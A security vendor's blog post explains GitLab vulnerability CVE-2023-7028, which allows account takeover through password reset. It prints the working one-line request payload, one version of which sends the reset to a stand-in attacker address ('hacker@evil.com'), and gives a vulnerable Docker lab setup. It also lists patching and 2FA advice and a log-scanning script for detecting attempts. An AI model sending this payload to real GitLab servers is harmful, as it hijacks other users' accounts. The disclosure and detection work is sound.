How to compromise Gitlab accounts with CVE-2023-7028 vulnerability

😮 Publicly exposing GitLab in 2024: too risky?



Is exposing one’s own GitLab a good security practice? Well, you will see that it is not.

2024 starts strongly, giving good reasons not to expose this service on the Internet (but rather to host it behind a VPN).

A tense start to the year

On January 11, 2024, GitLab, the renowned community platform, released an important announcement concerning new versions 16.7.2, 16.6.4, and 16.5.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).

Two vulnerabilities are described:

  1. The CVE-2023-7028 vulnerability:

    • CVSS score of 10/10 😮
    • It allows account takeover via password reset without user interaction.
  2. The CVE-2023-5356 vulnerability:

    • CVSS score of 9.6/10 😟
    • It allows a user to abuse Slack/Mattermost integrations to execute slash commands as another user.

In brief

The most problematic vulnerability is the first one: CVE-2023-7028.

Far from harmless, it is very problematic:

  • It allows resetting the password of any user.
  • The vulnerability is exploitable without an account.
  • The victim’s email must be known.
  • The payload consists of a single line: user[email][]=my.target@example.com&user[email][]=hacker@evil.com

The second vulnerability is just as serious but less easily exploitable.

Exploitation

To exploit this vulnerability, the PoC is very simple:

user[email][]=valid@email.com&user[email][]=attacker@email.com
  • valid@email.com is the victim’s address
  • attacker@email.com is the attacker’s address

GitLab creates confusion, allowing an attacker to overwrite the victim’s email with their own 😮!

More specifically, a change was made in version 16.1.0 to allow users to reset their passwords using a secondary email address. The vulnerability results from a bug in the email verification process.

👉 More details on GitLab’s blog: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/#account-takeover-via-password-reset-without-user-interactions

GitLab recommends the following actions:

1️⃣ Immediate Update: It is strongly advised to update GitLab to the latest patched version. For users who have not yet updated, GitLab recommends moving directly to versions 16.7.3, 16.6.5, 16.5.7 or later.

2️⃣ Enable Two-Factor Authentication (2FA): GitLab advises activating 2FA for all accounts. This security measure prevents the exploitation of this vulnerability.

3️⃣ Integrity Verification: Self-managed clients are advised to examine their logs to detect any exploitation attempts of these vulnerabilities.

Example:

  • Check the gitlab-rails/production_json.log file to ensure that no request pointing to the /users/password route contains multiple email addresses.
  • Check the gitlab-rails/audit_json.log file to ensure that the meta.caller_id field of PasswordsController#create and target_details do not contain multiple email addresses.
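The two log checks above can be scripted. The following is an added example (not code from the original post or from GitLab): it parses JSON log lines and flags password-reset requests that carry more than one email address. The sample lines are constructed to approximate the production_json.log and audit_json.log layouts described in the advisory (params as a list of key/value objects, meta.caller_id either nested or as a flat key); real entries contain more fields, so treat the field layout as an assumption to verify against your own logs.

```python
import json
import re
from typing import Any, Dict, List

# Constructed sample lines approximating gitlab-rails/production_json.log (not real captured logs).
SAMPLE_PRODUCTION_LOG = [
    json.dumps({"method": "POST", "path": "/users/password", "controller": "PasswordsController",
                "action": "create", "remote_ip": "203.0.113.10",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": ["alice@example.com"]}}]}),
    # Two addresses under user[email][]: the pattern the advisory tells admins to look for.
    json.dumps({"method": "POST", "path": "/users/password", "controller": "PasswordsController",
                "action": "create", "remote_ip": "198.51.100.7",
                "params": [{"key": "user", "value": {"email": ["alice@example.com", "attacker@example.net"]}}]}),
    json.dumps({"method": "GET", "path": "/users/sign_in", "controller": "SessionsController",
                "action": "new", "remote_ip": "203.0.113.10", "params": []}),
]

# Constructed sample lines approximating gitlab-rails/audit_json.log.
SAMPLE_AUDIT_LOG = [
    json.dumps({"meta.caller_id": "PasswordsController#create", "ip_address": "203.0.113.10",
                "target_details": "alice@example.com"}),
    json.dumps({"meta": {"caller_id": "PasswordsController#create"}, "ip_address": "198.51.100.7",
                "target_details": ["alice@example.com", "attacker@example.net"]}),
    json.dumps({"meta.caller_id": "SessionsController#create", "ip_address": "203.0.113.10",
                "target_details": "alice@example.com"}),
]

EMAIL_RE = re.compile(r"[^\s,;<>\"']+@[^\s,;<>\"']+")


def _parse(lines: List[str]):
    """Yield (line_number, entry) for every line that is valid JSON; skip the rest."""
    for n, line in enumerate(lines, 1):
        try:
            yield n, json.loads(line)
        except json.JSONDecodeError:
            continue


def _user_emails(params: Any) -> List[str]:
    """Return the email values submitted under user[email] from a params list."""
    for p in params or []:
        if isinstance(p, dict) and p.get("key") == "user" and isinstance(p.get("value"), dict):
            email = p["value"].get("email")
            if isinstance(email, list):
                return [str(e) for e in email]
            if email is not None:
                return [str(email)]
    return []


def _count_emails(value: Any) -> int:
    """Count email addresses in target_details, whether it is a list or a string."""
    if isinstance(value, list):
        return len(value)
    if isinstance(value, str):
        return len(EMAIL_RE.findall(value))
    return 0


def flag_production_log(lines: List[str]) -> List[Dict[str, Any]]:
    """Flag requests to /users/password whose user[email] carries more than one address."""
    hits = []
    for n, entry in _parse(lines):
        if entry.get("path") != "/users/password":
            continue
        emails = _user_emails(entry.get("params"))
        if len(emails) > 1:
            hits.append({"line": n, "remote_ip": entry.get("remote_ip"), "emails": emails})
    return hits


def flag_audit_log(lines: List[str]) -> List[Dict[str, Any]]:
    """Flag PasswordsController#create audit events whose target_details lists several emails."""
    hits = []
    for n, entry in _parse(lines):
        meta = entry.get("meta") if isinstance(entry.get("meta"), dict) else {}
        caller = meta.get("caller_id") or entry.get("meta.caller_id")
        if caller != "PasswordsController#create":
            continue
        if _count_emails(entry.get("target_details")) > 1:
            hits.append({"line": n, "ip_address": entry.get("ip_address"),
                         "target_details": entry.get("target_details")})
    return hits


if __name__ == "__main__":
    for hit in flag_production_log(SAMPLE_PRODUCTION_LOG):
        print("production_json.log: suspicious reset request", hit)
    for hit in flag_audit_log(SAMPLE_AUDIT_LOG):
        print("audit_json.log: suspicious reset event", hit)
```

To run it against real files, replace the sample lists with the lines of `gitlab-rails/production_json.log` and `gitlab-rails/audit_json.log`; a hit does not prove a successful takeover (the reset still has to be completed), but every flagged request should be investigated and the affected accounts' passwords and sessions reviewed.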

Automation

Many PoCs are available online to automate the exploitation of this vulnerability:

Vulnerable Docker

For the curious, below is a vulnerable docker compose file to practice this vulnerability:

version: '3.6'
services:
  gitlab:
    image: 'gitlab/gitlab-ce:16.1.4-ce.0'
    restart: always
    hostname: 'gitlab.domain.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://gitlab.domain.com'
        gitlab_rails['smtp_enable'] = true
        gitlab_rails['smtp_address'] = "smtp_address"
        gitlab_rails['smtp_port'] = 587
        gitlab_rails['smtp_user_name'] = "smtp_user_name"
        gitlab_rails['smtp_password'] = "smtp_password"
        gitlab_rails['smtp_domain'] = "domain.com"
        gitlab_rails['smtp_authentication'] = "login"
        gitlab_rails['smtp_enable_starttls_auto'] = true
    ports:
      - '80:80'
      - '443:443'
      - '22:22'
    volumes:
      - './gitlab/config:/etc/gitlab'
      - './gitlab/logs:/var/log/gitlab'
      - './gitlab/data:/var/opt/gitlab'

Available on Trackflaw’s GitHub: https://github.com/Trackflaw/CVE-2023-7028-Docker

Demonstration

A small demonstration below to present the exploitation of the vulnerability:

🙏 Patch quickly. Trackflaw is here to help you with this task. Contact us at https://trackflaw.com or by email contact (@) trackflaw.com

Sources